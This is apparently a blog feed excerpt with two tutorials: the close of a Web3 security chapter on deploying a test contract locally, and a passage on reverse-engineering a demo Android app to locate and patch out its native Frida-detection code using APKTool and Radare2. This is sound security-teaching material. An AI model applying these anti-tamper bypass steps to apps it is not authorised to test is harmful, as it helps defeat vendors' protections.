To start, Alex needs an account on the blockchain, which works like their profile and has a unique address tied to a private key. This account is managed through a wallet app like MetaMask, where the private key is securely stored. Think of this private key as a super-secure password that only Alex should have. With the wallet, Alex can directly interact with the blockchain from their computer or phone. To join the DeFi lending pool, Alex initiates a transaction to transfer some cryptocurrency to the DeFi application’s smart contract.

This transaction doesn’t just move funds from Alex’s account; it actually communicates with the smart contract—a self-executing piece of code that runs on the blockchain. In this case, the contract manages the lending pool, accepting deposits, calculating interest, and keeping track of who has contributed funds. When Alex submits this transaction, their wallet app “signs” it using their private key, making sure that the transaction is authentic and can’t be altered by anyone else.

Once signed, the transaction is broadcast to the blockchain network, where it awaits approval from **validators**. Validators are crucial players on the blockchain who confirm and record transactions. They ensure that each transaction follows the rules and, in exchange, they’re paid a fee, known as **gas**. Alex sets both a gas price (how much they’re willing to pay per unit of gas) and a gas limit (the max amount they’ll pay to process this transaction). Setting a higher gas price can speed things up since validators will prioritize transactions with higher fees. After the transaction is verified by the validators, it’s added to a new block on the blockchain—a block that contains this and other transactions. Once the block is completed, it’s linked to the chain of previous blocks, creating a permanent record of Alex’s transaction.

Once that’s done, the DeFi app’s smart contract confirms Alex’s deposit by issuing a **token** back to Alex’s account. This token is an ERC-20 token (a popular standard on Ethereum), and it represents Alex’s share in the lending pool. It’s a bit like a receipt that proves Alex has contributed to the pool and may start earning interest over time, depending on how the smart contract is set up.

At any time, Alex can use a **blockchain explorer** like Etherscan to track their transaction, check their token balance, or review details about the DeFi smart contract. Blockchain explorers provide transparency into all this activity, letting users see what’s happening across the network.

# Deploying Your Smart Contract Locally with Ganache UI

After understanding all the basic concepts, we’re ready to set up a local blockchain environment, deploy a smart contract, and start interacting with it. You can use any code editor you prefer—VS Code is a popular choice, but any editor will work just fine. In the upcoming chapters, we’ll dive into common vulnerabilities and explore strategies to secure your contracts effectively.

To get started, open your code editor and create a new project folder—let’s call it &quot;Ether.&quot; In your terminal, navigate to the project directory and initialize a Hardhat project with the following commands:

```bash
npm install --save-dev hardhat
npx hardhat init

```

![](/content/images/2024/10/image-26.png)

Hardhat CLI

Next, we’ll create the smart contract. Inside the _contracts_ folder, delete the sample contract (`Lock.sol` in recent Hardhat versions) and create a new file called `SimpleStorage.sol`. Open this file and add the following Solidity code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract SimpleStorage {
    uint256 private storedData;

    function set(uint256 x) public {
        storedData = x;
    }

    function get() public view returns (uint256) {
        return storedData;
    }
}

```

Our `SimpleStorage` contract is straightforward—it has a variable called `storedData` and two functions. The `set` function allows anyone to store a value in `storedData`, while the `get` function retrieves it. Once the contract is written, compile it by running `npx hardhat compile`:

![](/content/images/2024/10/image-27.png)

Compiling the SmartContract

Hardhat will compile your contract and store the output files in the _artifacts_ folder.

Now, let’s set up Ganache. [Open Ganache UI](https://archive.trufflesuite.com/ganache/), select _Quickstart Ethereum_, and it will create a local blockchain with 10 pre-funded accounts. The default RPC server for Ganache is `http://127.0.0.1:7545`. In Ganache, you’ll see a list of accounts—click the key icon next to one to reveal its private key and copy it.

![](/content/images/2024/10/image-33.png)

Accessing the private key of the account

Then, open _hardhat.config.js_ and add the Ganache network configuration:

```javascript
require(&quot;@nomicfoundation/hardhat-toolbox&quot;);

/** @type import(&apos;hardhat/config&apos;).HardhatUserConfig */
module.exports = {
  solidity: &quot;0.8.27&quot;,
  networks: {
    ganache: {
      url: &quot;http://127.0.0.1:7545&quot;, // Ganache&apos;s default RPC server address
      accounts: [
        &quot;0xd6d215c98c4fd42ddb7b1a8ab89275bc284412267ef3f300cb61ef6fcb0d4d4e&quot;,
      ], // Replace with a private key from Ganache UI
    },
  },
};



```

Replace the example key in `accounts` with the actual private key copied from Ganache, including the `0x` prefix. Ganache keys are throwaway test keys—never put a key that holds real funds in a config file.

With everything configured, it’s time to deploy! In the _scripts_ folder, create a new file called `deploy.js` and add the following code:

```javascript
const hre = require(&quot;hardhat&quot;);

async function main() {
  const SimpleStorage = await hre.ethers.getContractFactory(&quot;SimpleStorage&quot;);
  const simpleStorage = await SimpleStorage.deploy();
  await simpleStorage.waitForDeployment();

  console.log(&quot;SimpleStorage deployed to:&quot;, simpleStorage.target);
}

main().catch((error) =&gt; {
  console.error(error);
  process.exitCode = 1;
});


```

This script uses Hardhat’s `ethers` library to deploy the `SimpleStorage` contract and logs the contract’s address to the console. To deploy to the Ganache network, run:

```bash
npx hardhat run scripts/deploy.js --network ganache

```

Once you run the command, you should see the contract’s address in the terminal. To double-check, open Ganache UI and look under the _Transactions_ tab for the latest transaction. You’ll see the contract creation with the contract address included.

![](/content/images/2024/10/image-30.png)

Deploying the contract

![](/content/images/2024/10/image-34.png)

Contract deployed in Ganache

To interact with the contract, open the Hardhat console and specify Ganache as the network:

```bash
npx hardhat console --network ganache

```

In the console, you can attach to the deployed contract and call its functions. Start by attaching to the contract:

```javascript
const SimpleStorage = await ethers.getContractFactory(&quot;SimpleStorage&quot;);
const simpleStorage = await SimpleStorage.attach(&quot;YOUR_CONTRACT_ADDRESS&quot;); // Replace with the actual address

```

To set a value, use the `set` function as follows:

```javascript
await simpleStorage.set(42);

```

Then, retrieve the stored value with the `get` function:

```javascript
const value = await simpleStorage.get();
console.log(&quot;Stored Value:&quot;, value.toString());

```

Each interaction with the contract will appear as a transaction in Ganache UI, where you can view details about gas usage, account balances, and transaction status.

![](/content/images/2024/10/image-35.png)

Using the Hardhat console to interact with the network

![](/content/images/2024/10/image-36.png)

Successful transaction

# Conclusions

In this first chapter, we’ve covered the basics of Web3 concepts and set up a local environment for deploying smart contracts. Understanding these fundamentals is essential as we begin exploring how to identify and analyze vulnerabilities within decentralized applications.

In upcoming chapters, we’ll examine real-world vulnerabilities in smart contracts, diving into how they can be exploited and how to defend against these attacks. From reentrancy issues to insecure token implementations, each section will break down specific attack vectors and mitigation strategies, equipping you with the skills to secure Web3 projects effectively.

Thank you for joining me on this journey into Web3 security! Stay tuned as we delve deeper into practical examples, uncover common weaknesses, and develop a robust toolkit for securing the decentralized web.

# Resources

-   **Ganache** - Personal Blockchain for Ethereum Development. &quot;Truffle Suite.&quot; Available at: [https://trufflesuite.com/ganache/](https://trufflesuite.com/ganache/)
-   **Hardhat** - Ethereum Development Environment for Professionals. &quot;Hardhat Documentation.&quot; Available at: [https://hardhat.org/](https://hardhat.org/)
-   **Ethers.js** - A Complete and Compact Library for Interacting with the Ethereum Blockchain. &quot;Ethers.js Documentation.&quot; Available at: https://docs.ethers.org/
-   **Solidity** - Language for Writing Smart Contracts on Ethereum. &quot;Solidity Documentation.&quot; Available at: https://docs.soliditylang.org/
-   **MetaMask** - Ethereum Wallet and Gateway to Blockchain Apps. &quot;MetaMask.&quot; Available at: [https://metamask.io/](https://metamask.io/)
-   **OpenZeppelin** - Secure Smart Contract Libraries for Ethereum. &quot;OpenZeppelin.&quot; Available at: [https://openzeppelin.com/](https://openzeppelin.com/)
-   **Etherscan** - Ethereum Blockchain Explorer. &quot;Etherscan.&quot; Available at: [https://etherscan.io/](https://etherscan.io/)</content:encoded><author>Ruben Santos</author></item><item><title>Patching Native Libraries for Frida Detection Bypass</title><link>https://www.kayssel.com/post/android-10</link><guid isPermaLink="true">https://www.kayssel.com/post/android-10</guid><description>In this chapter, we learned to patch a native library to bypass Frida detection. We explored decompiling the APK, modifying the detection function’s flow, recompiling the APK, and testing the bypass, highlighting the limits of basic obfuscation.</description><pubDate>Sun, 27 Oct 2024 12:21:45 GMT</pubDate><content:encoded># Introduction

[In the previous chapter](https://www.kayssel.com/post/native/), we took a closer look at native libraries and how Frida can be used to bypass detection mechanisms even when the detection functions are implemented within native code. We demonstrated that while using native functions for detection makes bypassing more challenging, Frida’s flexibility can still overcome these security measures in many cases.

In today’s chapter, we’re shifting our focus to directly patching the native library itself. This approach allows us to modify the detection logic at its source, bypassing the detection code without relying on external workarounds. We’ll go through the process of decompiling the APK, analyzing the native code to locate detection functions, and implementing a patch that disables the Frida detection. By the end of this chapter, you’ll understand how to interact with native code directly, gaining insight into native-level security and reverse-engineering techniques.

# Updating the Native Library: Adding a Frida Detection Function

In this section, we&apos;ll explore how to enhance our native library code to include a more sophisticated Frida detection function. In contrast to simpler detection methods that return a `boolean` value, which Frida scripts can easily hook and override, this approach will instead exit the application immediately upon detecting Frida. This method is more robust, making it harder to bypass with typical Frida-based hooking.

Below is the code implementation for our `detectFridaAndExit` function, which checks for the presence of Frida using multiple methods and immediately exits the application if any Frida-related indicators are detected.

&lt;details&gt;
&lt;summary&gt;DetectFridaAndExit&lt;/summary&gt;

```cpp
#include &lt;jni.h&gt;
#include &lt;string&gt;
#include &lt;dirent.h&gt;  // To scan directories
#include &lt;unistd.h&gt;  // For access function
#include &lt;fstream&gt;   // To check for Frida processes
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;stdlib.h&gt;  // For exit()

extern &quot;C&quot; JNIEXPORT jstring JNICALL
Java_com_example_localauth_MainActivity_stringFromJNI(
        JNIEnv* env,
        jobject /* this */) {
    std::string hello = &quot;Hello from C++&quot;;
    return env-&gt;NewStringUTF(hello.c_str());
}

extern &quot;C&quot;
JNIEXPORT void JNICALL
Java_com_example_localauth_MainActivity_detectFridaAndExit(
        JNIEnv* env,
        jobject /* this */) {

    // 1. Check for Frida-related libraries in the process
    const char* suspiciousLibs[] = {
            &quot;frida-agent&quot;,
            &quot;frida-gadget&quot;,
            &quot;libfrida-gadget.so&quot;
    };

    for (const char* lib : suspiciousLibs) {
        // access() checks whether a file with this name exists on disk
        if (access(lib, F_OK) != -1) {
            exit(0);  // Frida detected, exit the application
        }
    }

    // 2. Check for Frida processes
    std::ifstream procList(&quot;/proc/self/maps&quot;);
    std::string line;
    while (std::getline(procList, line)) {
        if (line.find(&quot;frida&quot;) != std::string::npos) {
            exit(0);  // Frida detected, exit the application
        }
    }

    // 3. Check if the Frida server is listening on its common ports.
    // Note: /proc/net/tcp encodes ports in hex (27042 appears as 69A2), so
    // this literal decimal match is illustrative rather than robust.
    std::ifstream netstat(&quot;/proc/net/tcp&quot;);
    while (std::getline(netstat, line)) {
        if (line.find(&quot;127.0.0.1:27042&quot;) != std::string::npos ||  // Default Frida port
            line.find(&quot;127.0.0.1:27043&quot;) != std::string::npos) {  // Alternative Frida port
            exit(0);  // Frida detected, exit the application
        }
    }
}


```
&lt;/details&gt;


In this implementation:

-   **Library Scanning** checks for known Frida libraries (`frida-agent`, `frida-gadget`, and `libfrida-gadget.so`). If any of these are detected, the app terminates.
-   **Process Scanning** reads from `/proc/self/maps` to find any memory mappings related to Frida, closing the app if they’re detected.
-   **Port Scanning** inspects `/proc/net/tcp` for the default Frida server ports (`27042` and `27043`), which would suggest that frida-server is running on the device. Note that `/proc/net/tcp` records addresses in hexadecimal, so the literal decimal match used here is deliberately simplistic.
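
Because `/proc/net/tcp` stores ports in hexadecimal, it is worth checking what the default Frida ports look like there. The `adb` line below is illustrative only and assumes a device with frida-server running:

```bash
# Port 27042 appears as 69A2 in /proc/net/tcp (hex, uppercase)
printf &apos;%X\n&apos; 27042   # prints 69A2
printf &apos;%X\n&apos; 27043   # prints 69A3

# Illustrative on-device check (requires adb and a running frida-server):
# adb shell grep -i :69A2 /proc/net/tcp
```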

#### Integrating the Detection in `MainActivity`

In this example, we’ll integrate the Frida detection function at the start of `onCreate` in `MainActivity` to immediately check for Frida when the app launches. In a real-world scenario, however, the detection code could be spread across multiple activities, with obfuscated names, making it harder to detect and bypass. For the sake of this example, though, we’ll keep it simple by placing the detection code at the beginning of `onCreate` in a single location. This setup will ensure that if Frida is detected, the app terminates before fully loading.

Here’s the updated `MainActivity` class, with `detectFridaAndExit()` called within the `onCreate` method:

&lt;details&gt;
&lt;summary&gt;Main Activity Code&lt;/summary&gt;

```kotlin
package com.example.localauth

import android.content.Intent
import android.app.AlertDialog
import android.content.DialogInterface
import android.os.Bundle
import android.util.Base64
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import java.security.KeyStore
import javax.crypto.Cipher
import javax.crypto.KeyGenerator
import javax.crypto.SecretKey
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import android.util.Log
import javax.crypto.spec.GCMParameterSpec

class MainActivity : AppCompatActivity() {

    private lateinit var cipher: Cipher
    private lateinit var keyStore: KeyStore
    private val keyAlias = &quot;test&quot;
    val expectedData = &quot;PASSWORD&quot;.toByteArray()

    companion object {
        init {
            System.loadLibrary(&quot;native-lib&quot;) // library name without the &quot;lib&quot; prefix or &quot;.so&quot; extension
        }
    }
    external fun detectFridaAndExit()  // matches the void JNI function
    external fun stringFromJNI(): String

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        val messageFromNative = stringFromJNI()
        Log.d(&quot;JNI&quot;, &quot;Message from C++: $messageFromNative&quot;)

        detectFridaAndExit()

        createKey()

        val btnEncrypt: Button = findViewById(R.id.btn_encrypt)
        btnEncrypt.setOnClickListener {
            showBiometricPromptForEncryption(&quot;PASSWORD&quot;)
        }

        val btnReset: Button = findViewById(R.id.btn_reset)
        btnReset.setOnClickListener {
            resetEncryptedData()
        }

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            showBiometricPrompt()
        }
    }


    // Create Key in Keystore
    private fun createKey() {
        val keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
        val keyGenParameterSpec = KeyGenParameterSpec.Builder(
            keyAlias,
            KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
        ).setBlockModes(KeyProperties.BLOCK_MODE_GCM)
            .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
            .setUserAuthenticationRequired(true)
            .setInvalidatedByBiometricEnrollment(true)
            .setUserAuthenticationValidityDurationSeconds(-1)  // Require biometric every time
            .build()

        keyGenerator.init(keyGenParameterSpec)
        keyGenerator.generateKey()
    }

    // Initialize the cipher for encryption/decryption
    private fun initCipher(mode: Int, iv: ByteArray? = null): Boolean {
        return try {
            keyStore = KeyStore.getInstance(&quot;AndroidKeyStore&quot;)
            keyStore.load(null)

            val key = keyStore.getKey(keyAlias, null) as SecretKey
            cipher = Cipher.getInstance(&quot;${KeyProperties.KEY_ALGORITHM_AES}/${KeyProperties.BLOCK_MODE_GCM}/${KeyProperties.ENCRYPTION_PADDING_NONE}&quot;)

            if (mode == Cipher.ENCRYPT_MODE) {
                cipher.init(Cipher.ENCRYPT_MODE, key)  // Generate new IV
            } else if (mode == Cipher.DECRYPT_MODE &amp;&amp; iv != null) {
                val gcmSpec = GCMParameterSpec(128, iv)
                cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
            }
            true
        } catch (e: Exception) {
            e.printStackTrace()
            false
        }
    }

    // Show biometric prompt and tie it to the cipher object
    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                    try {
                        val decryptedData = decryptData(cryptoObject)
                        if (decryptedData == null || !isValidData(decryptedData)) {
                            Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                        } else {
                            showSuccess()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                } else {
                    Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
                }
            }
            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication&quot;)
                .setSubtitle(&quot;Log in using your fingerprint&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Updated: Fixing how cipher is used after biometric authentication completes
    private fun showBiometricPromptForEncryption(plainText: String) {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                val cryptoObject = result.cryptoObject
                if (cryptoObject != null) {
                    try {
                        // Encrypt after biometric authentication
                        val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                        if (encryptedData != null) {
                            val iv = cryptoObject.cipher?.iv  // Get the generated IV
                            storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                            Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                        }
                    } catch (e: Exception) {
                        e.printStackTrace()
                        Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                    }
                }
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        if (initCipher(Cipher.ENCRYPT_MODE)) {
            val cryptoObject = BiometricPrompt.CryptoObject(cipher)
            val promptInfo = BiometricPrompt.PromptInfo.Builder()
                .setTitle(&quot;Biometric Authentication for Encryption&quot;)
                .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
                .setNegativeButtonText(&quot;Use password&quot;)
                .build()

            biometricPrompt.authenticate(promptInfo, cryptoObject)
        }
    }

    // Check if decrypted data is valid
    private fun isValidData(decryptedData: ByteArray): Boolean {
        return decryptedData.contentEquals(expectedData)  // Example validation
    }

    // Decrypt data using the CryptoObject
    private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
        return try {
            val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
            val iv = retrieveStoredIV()  // Retrieve the stored IV
            if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
                val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
                decryptedData
            } else {
                null
            }
        } catch (e: Exception) {
            e.printStackTrace()
            null
        }
    }

    private fun encryptAndStoreData(plainText: String) {
        if (initCipher(Cipher.ENCRYPT_MODE)) {
            try {
                val encryptedData = cipher.doFinal(plainText.toByteArray())
                val iv = cipher.iv  // Get the generated IV
                storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
            } catch (e: Exception) {
                e.printStackTrace()
                Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    // Simulate storing encrypted data and IV (replace with actual storage logic)
    private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.putString(&quot;encrypted_data&quot;, encryptedData)
        editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
        editor.apply()
    }

    // Retrieve encrypted data and IV
    private fun retrieveEncryptedData(): String {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
    }

    private fun retrieveStoredIV(): ByteArray {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
        return Base64.decode(ivString, Base64.DEFAULT)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish()  // Optionally finish MainActivity to prevent going back without re-authentication
    }
    private fun resetEncryptedData() {
        val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
        val editor = sharedPreferences.edit()
        editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
        editor.remove(&quot;iv&quot;)  // Remove IV
        editor.apply()
        Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
        Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
    }

    // Show a message to the user when Frida is detected and close the app
    private fun showFridaDetectedDialog() {
        val builder = AlertDialog.Builder(this)
        builder.setTitle(&quot;Security Warning&quot;)
        builder.setMessage(&quot;Frida or another tampering tool has been detected. The app will now close for security reasons.&quot;)
        builder.setCancelable(false)
        builder.setPositiveButton(&quot;OK&quot;) { dialog: DialogInterface, _: Int -&gt;
            dialog.dismiss()
            closeApp()
        }
        val dialog: AlertDialog = builder.create()
        dialog.show()
    }

    // Method to close the app
    private fun closeApp() {
        Toast.makeText(this, &quot;Closing app...&quot;, Toast.LENGTH_SHORT).show()
        finishAffinity()  // Close the app completely
    }
}

```
&lt;/details&gt;


#### Explanation of Changes

1.  **Immediate Frida Detection**:  
    We call `detectFridaAndExit()` at the beginning of `onCreate()`. This approach checks for Frida as soon as the app starts, terminating it immediately if any suspicious libraries or processes are detected.
2.  **Native Function Call Setup**:  
    The `detectFridaAndExit()` function relies on the native library loaded in the companion object (`System.loadLibrary(&quot;native-lib&quot;)`), which ensures our Frida detection logic is ready to execute upon launch.

# Building the Release Version of the APK

In this section, we’re going to create a release APK so we can later reverse-engineer it, simulating the process of analyzing an app as if it were in a real-world scenario.

Now, with the code set up, we’ll enable obfuscation with ProGuard (or R8, its default replacement). Obfuscation adds a layer of complexity by renaming classes, methods, and variables to make the code harder to interpret if someone tries to reverse-engineer it. This is especially useful here since our example includes Frida detection code in the native library, and we want to see how that looks after the obfuscation process.

To enable ProGuard, go to the `build.gradle` file for the app module and locate the `release` build type. Here, we’ll set `minifyEnabled` to `true`. For this example, we’ll keep things simple and leave the `proguard-rules.pro` file as-is, allowing Android Studio to apply its default obfuscation rules.
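
The relevant `release` block ends up looking roughly like this (a sketch; your module&apos;s `build.gradle` may declare additional options, and the default ProGuard file name can differ between templates):

```groovy
android {
    buildTypes {
        release {
            // Enables R8 code shrinking and obfuscation
            minifyEnabled true
            proguardFiles getDefaultProguardFile(&apos;proguard-android-optimize.txt&apos;),
                    &apos;proguard-rules.pro&apos;
        }
    }
}
```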

![](/content/images/2024/10/image-6.png)

ProGuard setup

With obfuscation configured, we need to create a signing key. In Android Studio, go to **Build** &gt; **Generate Signed Bundle / APK...** and choose **APK**. If you don’t have a keystore yet, select **Create new...** and fill in the required details: the keystore location, password, key alias, and key-specific password. This signing key will serve as the app’s unique digital signature, verifying its authenticity. Make sure to store the keystore file securely, as it’s essential for future APK versions.

![](/content/images/2024/10/image-5.png)

Keystore setup

Finally, let’s build the APK. Go back to **Build** &gt; **Generate Signed Bundle / APK...**, select **release** as the build type, enter your keystore details, and let Android Studio handle the compilation and signing process. The resulting APK will be stored in the `app/build/outputs/apk/release` folder.

# Verifying Frida Detection in the Release APK

Now that we’ve built the release APK with Frida detection enabled, let’s test it by attempting to attach Frida to the app. If our detection code is working as expected, the app should terminate as soon as Frida attempts to connect, signaling that the detection mechanism is actively blocking the instrumentation attempt.

To test this, run Frida with the following command:

```bash
frida -U -f com.example.localauth -l methods.js

```

methods.js

```javascript
Java.perform(function() {
    var MainActivity = Java.use(&apos;com.example.localauth.MainActivity&apos;);
    console.log(&quot;Listing MainActivity methods:&quot;);
    console.log(MainActivity.class.getDeclaredMethods());
});

```

This command tells Frida to attach to the app with the specified package name (`com.example.localauth`) and load a JavaScript file (`methods.js`) to interact with the app. Once executed, Frida will attempt to spawn the app and connect to it.

As seen in the output, Frida successfully lists the methods in `MainActivity`, indicating it’s connected. However, immediately afterward, the **Process terminated** message appears. This confirms that the Frida detection mechanism in the `detectFridaAndExit` function is working correctly. The detection code recognizes the presence of Frida and forces the app to exit, terminating the session.

![](/content/images/2024/10/image-20.png)

Frida Detection

# Limitations of Basic Obfuscation in Hiding Detection Functions

After generating the release APK with basic obfuscation enabled, we can see one of the limitations of leaving ProGuard (or R8) with default settings. Many developers rely on these default settings, but as shown in the images, the Frida detection function `detectFridaAndExit` is still easily identifiable in the code. Even with obfuscation, the function name is readable, making it relatively straightforward for someone analyzing the APK to locate it.

In this case, a reverse engineer could quickly search for &quot;Frida&quot; or similar keywords and easily find this function ([in this case I have used Jadx](https://github.com/skylot/jadx)). Once located, they could bypass the detection by modifying the APK to remove or comment out this function, rendering the Frida detection ineffective. This demonstrates how default obfuscation offers only a basic level of protection and may not be sufficient for apps that require robust security measures.

![](/content/images/2024/10/image-21.png)

Code obfuscated

![](/content/images/2024/10/image-22.png)

Searching for Frida

![](/content/images/2024/10/image-23.png)

Detection of the function

In more advanced setups, developers might apply custom obfuscation rules, rename critical functions to obscure names, or distribute detection checks throughout the code in non-obvious ways. This would make the detection mechanism much harder to identify and bypass. For example, spreading detection logic across various activities and randomizing function names would increase the difficulty significantly for anyone attempting to reverse-engineer the app.

In our example, we left obfuscation in its simplest form for demonstration purposes. However, for real-world applications requiring high levels of security, more tuned and advanced obfuscation would be necessary to effectively protect detection mechanisms like this one.

# Decompiling the APK to Access the Native Library

Moving on from obfuscation, with our release APK prepared, the next step is to decompile it to access the files within, focusing on extracting the native library. This will allow us to inspect the Frida detection code and prepare for reverse-engineering. We’ll use APKTool, a powerful tool widely used in Android reverse engineering, to unpack APK files and access their resources and code.

Start by running APKTool on the release APK. The command below will decompile the APK and place the output in a directory called `testing`:
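
The invocation shown in the screenshot can be reproduced as follows (the APK filename here is an assumption; adjust the path to match your build output):

```bash
# Decompile the release APK without decoding resources (-r),
# overwriting any previous output (-f), into the testing directory
apktool d -f -r app-release.apk -o testing
```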

![](/content/images/2024/10/image-12.png)

Decompiling the application

Let’s break down the command:

-   `d` stands for &quot;decode,&quot; APKTool&apos;s command for decompiling an APK.
-   `-f` forces overwriting any existing output directory.
-   `-r` tells APKTool to skip decoding resources, which speeds up the decompilation and, in this case, prevents resource issues that can arise when modifying native libraries. By avoiding resource decoding, we can later make changes to the native library without APKTool trying to recompile resources, [which could potentially cause compatibility issues.](https://github.com/iBotPeaches/Apktool/issues/1626)
-   `-o testing` specifies the output directory, where APKTool will place the decompiled files.

After running this command, APKTool will extract the APK contents into the `testing` directory, as shown in the screenshot, copying files like `classes.dex`, assets, and libraries.

Next, navigate to the `lib` folder in the decompiled directory. Here, you’ll see subdirectories for each supported architecture, such as `x86_64`, `armeabi-v7a`, etc. In this case, we’ll be focusing on `x86_64` because we plan to test the APK on an emulator, which typically uses the x86\_64 architecture for compatibility. You should find `libnative-lib.so` within the `lib/x86_64` directory.

![](/content/images/2024/10/image-13.png)

Libnative-lib

# Analyzing the Native Library with Radare2

With our `libnative-lib.so` extracted from the decompiled APK, the next step is to analyze this native library to locate and understand the Frida detection logic. For this, we’ll use Radare2 (often referred to as `r2`), a powerful open-source reverse-engineering tool. Radare2 will help us disassemble the library, search for specific functions, and inspect the code in detail.

&lt;details&gt;
&lt;summary&gt;Start by launching Radare2 in write mode on the native library file with the following command:&lt;/summary&gt;

```bash
r2 -w libnative-lib.so

```
&lt;/details&gt;


Radare2 will load the library, displaying initial warnings about unknown entry points. This is common, as Radare2 might struggle to identify the exact start point without additional configuration. However, we can still proceed with our analysis.

Once inside Radare2, run a preliminary analysis with:

```bash
aaa

```

![](/content/images/2024/10/image-15.png)

Analyzing the binary

This command performs an in-depth analysis, which includes identifying functions, cross-references, and other important structures in the binary. You may see warnings about invalid addresses or incomplete analysis; Radare2 often needs to interpret these files without all the metadata available, but it still provides a functional disassembly.

To locate our Frida detection function, let’s search for references to &quot;frida&quot; within the binary:
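
From inside the Radare2 shell, listing symbols and filtering them does the job; a typical invocation (the exact command in the screenshot may differ slightly) is:

```bash
# is lists the binary&apos;s symbols; ~ is r2&apos;s internal grep
is~frida
```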

![](/content/images/2024/10/image-16.png)

Detecting the function

This command looks through the symbol information and filters for any mention of &quot;frida,&quot; which helps us quickly pinpoint relevant functions or symbols. As shown in the screenshot, the search reveals a function called `Java_com_example_localauth_MainActivity_detectFridaAndExit` at address `0x00060b50`. This is our target function containing the Frida detection logic we implemented in the native code.

Now, we can disassemble this function to analyze it more closely. Use the following command:

```bash
pd @ 0x00060b50

```

![](/content/images/2024/10/image-8.png)

Assembly code of detectFridaAndExit

The `pd` command disassembles the code at the specified address, revealing the actual instructions within `detectFridaAndExit`. In the disassembly, you’ll see the low-level operations that implement our Frida checks, such as loading suspicious strings into memory, comparing addresses, and pushing values onto the stack.

Here, we can begin to see how Radare2 interprets our C++ code in assembly language, showing how each check within `detectFridaAndExit` is translated into machine-level instructions. This disassembly provides a detailed view of the function&apos;s behavior and allows us to verify that the detection checks we coded (such as searching for Frida libraries and processes) are present and functioning as expected.

